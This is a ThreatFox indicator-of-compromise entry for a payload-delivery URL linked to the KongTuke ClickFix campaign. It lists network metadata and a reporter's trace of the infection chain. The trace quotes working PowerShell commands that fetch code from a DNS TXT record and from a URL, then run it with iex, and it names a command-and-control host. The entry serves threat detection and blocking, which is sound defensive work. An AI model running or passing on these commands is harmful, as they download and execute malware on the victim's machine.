ThreatFox IOC Database

You are viewing the ThreatFox database entry for url https://hermisron.com/agent?token=c98348aa5479df05dae407a4c8771f66ff1f8f0708357037.

Database Entry


IOC ID:1685871
IOC: https://hermisron.com/agent?token=c98348aa5479df05dae407a4c8771f66ff1f8f0708357037
IOC Type :url
Threat Type :payload_delivery
Malware: Unknown malware
Confidence Level : Confidence level is high (100%)
Is compromised? : False
ASN:AS399629 BLNWX
Country:- NL
First seen:2025-12-24 14:54:43 UTC
Last seen:never
UUID:62ff3a36-e0d2-11f0-9957-42010aa4000a
Reporter rmceoin
Reward 5 credits from ThreatFox
Tags:Kongtuke

Avatar
rmceoin
hXXps://emierich[.]com/2o2o.js
-->
hXXps://emierich[.]com/js.php (ClickFix)
-->
powershell -w h -ep bypass -c "iex((Resolve-DnsName -Type TXT payload.bruemald.top -Server 8.8.8.8).Strings -join '')"
-->
payload.bruemald.top
(DNS TXT record)
-->
irm 'https://hermisron.com/agent?token=c98348aa5479df05dae407a4c8771f66ff1f8f0708357037'|iex
-->
app.frugesta.top
C2

494e6d3017ce987b086ae14ec4065f75cfa051bc993f22c6cf944fd6be78bd48 agent